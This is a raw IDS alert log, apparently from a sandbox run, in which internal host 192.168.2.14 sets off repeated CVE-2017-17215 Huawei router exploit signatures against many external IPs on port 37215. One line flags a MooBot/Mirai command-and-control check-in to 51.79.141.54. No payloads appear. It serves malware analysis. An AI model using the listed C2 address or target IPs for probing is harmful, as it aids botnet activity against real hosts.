                                                    07/10/24-08:26:20.122842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5289037215192.168.2.1441.136.221.221
                                                    07/10/24-08:26:43.919816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598037215192.168.2.14157.99.212.107
                                                    07/10/24-08:27:32.592657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416637215192.168.2.14197.192.16.44
                                                    07/10/24-08:26:34.256446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318237215192.168.2.14157.24.64.170
                                                    07/10/24-08:26:28.844720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868037215192.168.2.14157.86.195.60
                                                    07/10/24-08:26:42.353894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932837215192.168.2.14157.128.202.228
                                                    07/10/24-08:26:26.587829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511437215192.168.2.1441.168.120.151
                                                    07/10/24-08:26:45.652788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332237215192.168.2.14157.136.138.244
                                                    07/10/24-08:26:13.780678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430437215192.168.2.1438.16.177.91
                                                    07/10/24-08:27:28.140303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582437215192.168.2.1441.197.218.203
                                                    07/10/24-08:26:43.543257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.14197.173.93.60
                                                    07/10/24-08:27:31.532257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000037215192.168.2.14197.88.205.104
                                                    07/10/24-08:26:42.407706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263037215192.168.2.14121.118.219.93
                                                    07/10/24-08:26:59.645558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537237215192.168.2.14157.154.3.181
                                                    07/10/24-08:26:51.949287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574437215192.168.2.1477.174.105.247
                                                    07/10/24-08:27:10.662602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807837215192.168.2.14157.243.42.30
                                                    07/10/24-08:26:59.834726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109037215192.168.2.14197.27.173.71
                                                    07/10/24-08:26:26.603545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887637215192.168.2.1423.227.98.252
                                                    07/10/24-08:27:30.503122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5179437215192.168.2.1441.168.99.144
                                                    07/10/24-08:27:02.857366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405437215192.168.2.14157.202.233.166
                                                    07/10/24-08:26:13.644987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818037215192.168.2.1496.57.127.24
                                                    07/10/24-08:26:53.161125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508437215192.168.2.1499.175.7.118
                                                    07/10/24-08:27:30.560872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818637215192.168.2.14157.174.249.125
                                                    07/10/24-08:26:21.733368TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)467005976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:33.177763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565637215192.168.2.14157.185.73.123
                                                    07/10/24-08:26:45.691273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358037215192.168.2.14157.131.117.160
                                                    07/10/24-08:26:52.036040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911037215192.168.2.14132.73.219.183
                                                    07/10/24-08:26:36.414478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880037215192.168.2.14157.39.169.241
                                                    07/10/24-08:26:59.654831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223237215192.168.2.14157.202.137.192
                                                    07/10/24-08:26:45.575207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331037215192.168.2.14157.219.208.209
                                                    07/10/24-08:27:08.448133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4646437215192.168.2.14105.216.75.77
                                                    07/10/24-08:27:07.249453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4928637215192.168.2.14157.71.49.130
                                                    07/10/24-08:26:23.294907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106237215192.168.2.1441.48.200.60
                                                    07/10/24-08:26:36.392323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451037215192.168.2.1441.9.162.186
                                                    07/10/24-08:27:31.548799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838837215192.168.2.1441.184.71.132
                                                    07/10/24-08:26:28.763901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783237215192.168.2.1441.220.104.40
                                                    07/10/24-08:27:19.315486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067637215192.168.2.14157.31.21.33
                                                    07/10/24-08:26:36.339943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058437215192.168.2.1441.227.31.28
                                                    07/10/24-08:26:36.387027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3350837215192.168.2.14157.123.44.9
                                                    07/10/24-08:26:52.027011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317437215192.168.2.14197.20.207.228
                                                    07/10/24-08:27:30.489960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110837215192.168.2.14117.227.122.219
                                                    07/10/24-08:26:49.864771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855637215192.168.2.14191.62.250.225
                                                    07/10/24-08:27:32.479607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287437215192.168.2.14191.97.197.11
                                                    07/10/24-08:26:42.398868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449237215192.168.2.14197.51.96.87
                                                    07/10/24-08:26:53.198368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629437215192.168.2.14197.210.180.4
                                                    07/10/24-08:27:28.126116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292037215192.168.2.14157.177.142.172
                                                    07/10/24-08:27:31.483215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727037215192.168.2.14197.14.106.7
                                                    07/10/24-08:26:38.648548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246237215192.168.2.14157.239.115.113
                                                    07/10/24-08:26:18.008169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783437215192.168.2.14197.60.169.214
                                                    07/10/24-08:26:53.198979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414837215192.168.2.1441.14.193.171
                                                    07/10/24-08:26:17.999784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719837215192.168.2.1465.88.78.185
                                                    07/10/24-08:26:41.525899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065437215192.168.2.14221.164.96.121
                                                    07/10/24-08:26:26.563035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892037215192.168.2.14197.253.178.146
                                                    07/10/24-08:26:29.832296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287237215192.168.2.1441.218.14.205
                                                    07/10/24-08:26:28.850354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037437215192.168.2.1441.136.90.229
                                                    07/10/24-08:26:23.344718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494237215192.168.2.1441.231.96.232
                                                    07/10/24-08:26:28.854887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181437215192.168.2.14117.176.127.237
                                                    07/10/24-08:26:59.633265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062037215192.168.2.14126.17.178.233
                                                    07/10/24-08:27:07.389278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562637215192.168.2.1441.58.124.66
                                                    07/10/24-08:27:08.410834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188037215192.168.2.14157.29.171.211
                                                    07/10/24-08:26:34.180916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851037215192.168.2.14157.193.211.69
                                                    07/10/24-08:27:16.996210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631637215192.168.2.1441.200.10.234
                                                    07/10/24-08:26:28.900792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386037215192.168.2.14197.123.43.6
                                                    07/10/24-08:27:22.828817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209837215192.168.2.14197.110.175.250
                                                    07/10/24-08:27:30.533140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363037215192.168.2.14157.70.79.230
                                                    07/10/24-08:26:18.003273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362637215192.168.2.14157.63.212.114
                                                    07/10/24-08:26:49.781765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373437215192.168.2.1441.89.39.153
                                                    07/10/24-08:26:17.980540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545437215192.168.2.14134.182.131.50
                                                    07/10/24-08:26:43.820799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850237215192.168.2.1441.244.112.218
                                                    07/10/24-08:26:53.187114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476637215192.168.2.1441.90.160.102
                                                    07/10/24-08:26:45.653833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956837215192.168.2.1441.102.166.198
                                                    07/10/24-08:27:13.979728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443037215192.168.2.14157.43.26.29
                                                    07/10/24-08:26:36.415941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211637215192.168.2.14208.67.19.134
                                                    07/10/24-08:26:45.615423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128637215192.168.2.1441.153.208.216
                                                    07/10/24-08:27:11.494437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293037215192.168.2.1441.93.132.108
                                                    07/10/24-08:26:28.869440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402837215192.168.2.1441.47.39.233
                                                    07/10/24-08:26:13.833831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587237215192.168.2.14197.159.168.10
                                                    07/10/24-08:27:05.206517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573837215192.168.2.1485.57.254.58
                                                    07/10/24-08:26:36.357123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045237215192.168.2.1441.253.85.72
                                                    07/10/24-08:26:34.202638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710237215192.168.2.1452.154.176.143
                                                    07/10/24-08:26:43.862502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459237215192.168.2.14157.240.72.177
                                                    07/10/24-08:26:59.639186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623837215192.168.2.14157.234.3.205
                                                    07/10/24-08:27:19.273246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319837215192.168.2.1441.62.173.64
                                                    07/10/24-08:26:49.900161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4546837215192.168.2.14157.124.104.223
                                                    07/10/24-08:27:14.822336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300037215192.168.2.14197.252.85.214
                                                    07/10/24-08:27:02.923220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901237215192.168.2.14138.33.22.235
                                                    07/10/24-08:26:22.283618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3583637215192.168.2.14157.134.245.224
                                                    07/10/24-08:27:27.146425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379837215192.168.2.1441.58.10.233
                                                    07/10/24-08:26:42.363938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171237215192.168.2.1441.73.218.6
                                                    07/10/24-08:26:59.822486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643637215192.168.2.14174.9.229.42
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367037215192.168.2.1441.205.148.20
                                                    07/10/24-08:26:25.492414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970237215192.168.2.14157.172.220.101
                                                    07/10/24-08:26:55.359500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4310637215192.168.2.1441.85.190.133
                                                    07/10/24-08:27:20.434935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591237215192.168.2.14197.58.144.45
                                                    07/10/24-08:26:55.312291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915437215192.168.2.14197.62.34.86
                                                    07/10/24-08:27:08.417539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477037215192.168.2.14197.8.4.186
                                                    07/10/24-08:26:26.620652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434837215192.168.2.14157.154.86.171
                                                    07/10/24-08:26:57.636367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797037215192.168.2.14128.180.78.17
                                                    07/10/24-08:26:43.861312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539437215192.168.2.14197.252.5.28
                                                    07/10/24-08:26:38.573652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3381437215192.168.2.1441.65.172.243
                                                    07/10/24-08:26:38.605361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030637215192.168.2.1441.219.17.81
                                                    07/10/24-08:27:27.133887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324437215192.168.2.14197.175.134.197
                                                    07/10/24-08:26:11.613334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315437215192.168.2.14113.146.63.134
                                                    07/10/24-08:27:23.853234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714637215192.168.2.14157.227.56.161
                                                    07/10/24-08:26:47.939160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498837215192.168.2.14199.205.228.0
                                                    07/10/24-08:27:19.250416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535637215192.168.2.1441.71.10.40
                                                    07/10/24-08:27:03.002542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876437215192.168.2.14157.61.200.134
                                                    07/10/24-08:27:13.822075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987237215192.168.2.1441.27.25.129
                                                    07/10/24-08:26:57.501573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133837215192.168.2.14171.221.13.158
                                                    07/10/24-08:26:36.412614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446637215192.168.2.1447.209.104.112
                                                    07/10/24-08:26:43.647705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872437215192.168.2.14197.37.222.77
                                                    07/10/24-08:27:05.083830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233837215192.168.2.14157.9.234.164
                                                    07/10/24-08:26:25.438219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919037215192.168.2.14157.88.163.249
                                                    07/10/24-08:26:59.757690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025237215192.168.2.14157.239.128.34
                                                    07/10/24-08:26:18.003215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958037215192.168.2.14192.223.243.110
                                                    07/10/24-08:26:43.870524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778237215192.168.2.14219.126.215.219
                                                    07/10/24-08:27:20.446313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571637215192.168.2.14141.63.71.55
                                                    07/10/24-08:27:22.784576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846437215192.168.2.14197.41.214.13
                                                    07/10/24-08:26:22.291888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955637215192.168.2.14136.188.209.118
                                                    07/10/24-08:27:31.526473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056237215192.168.2.14157.32.1.202
                                                    07/10/24-08:26:59.647957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072437215192.168.2.14151.222.205.88
                                                    07/10/24-08:26:29.883548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367837215192.168.2.14157.245.34.185
                                                    07/10/24-08:26:33.204295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908037215192.168.2.14197.51.151.142
                                                    07/10/24-08:26:45.666714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705437215192.168.2.1441.100.30.255
                                                    07/10/24-08:27:24.956941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093637215192.168.2.14157.100.194.150
                                                    07/10/24-08:26:22.217078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021437215192.168.2.1441.118.177.102
                                                    07/10/24-08:27:22.748001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026637215192.168.2.14197.59.54.4
                                                    07/10/24-08:27:14.829159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917037215192.168.2.14157.211.2.182
                                                    07/10/24-08:27:14.893139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969837215192.168.2.1441.182.117.254
                                                    07/10/24-08:27:22.872449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553837215192.168.2.14199.113.233.161
                                                    07/10/24-08:26:36.341806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560237215192.168.2.14157.136.123.208
                                                    07/10/24-08:26:26.603545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984437215192.168.2.1441.220.21.211
                                                    07/10/24-08:27:28.153609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442237215192.168.2.14157.80.83.46
                                                    07/10/24-08:26:53.155624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686837215192.168.2.1441.123.63.240
                                                    07/10/24-08:26:14.801295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671837215192.168.2.14157.29.125.66
                                                    07/10/24-08:26:28.757409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035637215192.168.2.1419.208.17.9
                                                    07/10/24-08:26:53.168197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058037215192.168.2.14157.31.101.60
                                                    07/10/24-08:26:22.278406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128837215192.168.2.14197.63.161.33
                                                    07/10/24-08:26:36.330263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534837215192.168.2.1434.235.136.175
                                                    07/10/24-08:26:15.873682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721437215192.168.2.14149.143.60.77
                                                    07/10/24-08:26:11.434490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849637215192.168.2.14157.5.249.164
                                                    07/10/24-08:26:28.784131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813837215192.168.2.1441.93.189.37
                                                    07/10/24-08:26:14.787511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710837215192.168.2.14197.129.50.6
                                                    07/10/24-08:26:43.592956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334837215192.168.2.14197.249.107.49
                                                    07/10/24-08:27:10.655390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741637215192.168.2.14168.199.219.218
                                                    07/10/24-08:26:29.887676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213037215192.168.2.1441.205.80.140
                                                    07/10/24-08:26:55.447163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478237215192.168.2.1441.143.30.192
                                                    07/10/24-08:27:19.315486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793637215192.168.2.14157.100.90.165
                                                    07/10/24-08:26:13.776398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331437215192.168.2.14113.87.153.122
                                                    07/10/24-08:27:30.545208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131637215192.168.2.14197.79.251.150
                                                    07/10/24-08:26:22.279073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278437215192.168.2.14197.172.25.172
                                                    07/10/24-08:26:34.210999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839837215192.168.2.1441.160.151.9
                                                    07/10/24-08:27:22.877678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973037215192.168.2.14157.8.78.11
                                                    07/10/24-08:26:59.778453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042637215192.168.2.14197.116.5.235
                                                    07/10/24-08:27:32.609585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384037215192.168.2.14157.102.249.221
                                                    07/10/24-08:26:25.467339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436037215192.168.2.14157.195.241.167
                                                    07/10/24-08:26:13.833960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789037215192.168.2.1441.36.146.121
                                                    07/10/24-08:26:26.607824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984837215192.168.2.1441.117.26.10
                                                    07/10/24-08:27:22.539447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212437215192.168.2.1441.163.119.124
                                                    07/10/24-08:26:59.807030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259837215192.168.2.14197.117.233.149
                                                    07/10/24-08:27:19.334361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892637215192.168.2.14157.89.127.234
                                                    07/10/24-08:26:14.623309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115037215192.168.2.14157.195.182.4
                                                    07/10/24-08:27:28.179861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895437215192.168.2.14197.32.22.44
                                                    07/10/24-08:27:22.802348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979037215192.168.2.14197.144.137.179
                                                    07/10/24-08:26:13.646644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018637215192.168.2.1441.73.243.177
                                                    07/10/24-08:27:02.694487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631437215192.168.2.14157.242.240.203
                                                    07/10/24-08:26:14.626049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359637215192.168.2.1441.70.63.61
                                                    07/10/24-08:26:43.766765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844237215192.168.2.14197.97.24.25
                                                    07/10/24-08:26:57.667914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694637215192.168.2.14157.162.147.139
                                                    07/10/24-08:26:57.596939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880437215192.168.2.14197.4.154.215
                                                    07/10/24-08:27:32.545496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101037215192.168.2.1441.144.36.21
                                                    07/10/24-08:27:19.290878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126837215192.168.2.14157.42.159.159
                                                    07/10/24-08:27:02.914738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977637215192.168.2.14157.110.188.7
                                                    07/10/24-08:26:29.794005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609237215192.168.2.14197.206.218.42
                                                    07/10/24-08:27:23.939164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356437215192.168.2.14197.24.191.215
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867837215192.168.2.1441.12.183.15
                                                    07/10/24-08:26:22.298145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321037215192.168.2.14157.136.54.31
                                                    07/10/24-08:27:27.172380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754837215192.168.2.14173.62.208.83
                                                    07/10/24-08:26:51.986652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017837215192.168.2.14204.78.1.185
                                                    07/10/24-08:26:26.592095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341037215192.168.2.14172.13.119.26
                                                    07/10/24-08:27:02.807420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246037215192.168.2.14197.156.87.147
                                                    07/10/24-08:26:34.251159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717237215192.168.2.1441.100.89.102
                                                    07/10/24-08:26:38.546157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133037215192.168.2.14157.194.228.57
                                                    07/10/24-08:26:55.273109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771037215192.168.2.14157.103.128.32
                                                    07/10/24-08:26:22.224189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3604037215192.168.2.14157.149.106.14
                                                    07/10/24-08:26:22.232329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712237215192.168.2.14139.23.100.222
